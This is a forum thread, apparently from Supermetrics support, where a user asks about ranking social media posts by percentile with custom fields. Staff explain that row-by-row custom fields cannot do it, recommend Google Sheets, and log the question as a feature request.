One piece of data I find helpful is to know how a social media post ranks among all previous posts from that account. For example, if a post receives 500 engagements, that means it is 88th percentile, ranking 221 out of 1885 total posts.

Is there a way to create a custom field that would calculate this?

The way I’ve been doing it is within Google Sheets, where all the metrics for all posts is located within a single column so the formula is easy. But I’ve never worked with custom fields in Supermetrics before so I would love if I could figure that out.

Hi @delainamac

That is a great use case! Ranking your performance against your historical data is a great way to add context to social metrics.

I checked with our team regarding our Custom Fields functionality, and here is the current breakdown of how that works:

  • Row-by-Row Logic: Currently, Supermetrics custom fields are designed to transform data on a row-by-row basis (for example, multiplying one column by another).

  • Dataset Limitations: To calculate a rank or percentile, the system needs to "see" every single row in your history at once to determine where a specific post fits in.

  • Current Architecture: Because custom fields calculate values for each row independently, they don't currently have the "bird's eye view" of the entire dataset required for ranking.

The Verdict: Your current method in Google Sheets is actually the most effective way to do this right now. Since a spreadsheet can hold your entire post history in a single column, it is the ideal environment for those specific types of calculations.

That being said, I think this is a brilliant idea for a future update. I am going to convert this post into a feature request for our product team to review. The ability to perform "window calculations" (like ranking) directly within the Supermetrics Hub would be a game-changer for many users!

For more details on what you can currently do with our custom fields, feel free to check out our documentation: About Supermetrics Custom Fields.

Thanks for sharing @delainamac!

This is not the first time we get a feature request for supporting custom fields across several rows or a column grand total. So this is definitely something we’d like to implement in the future.
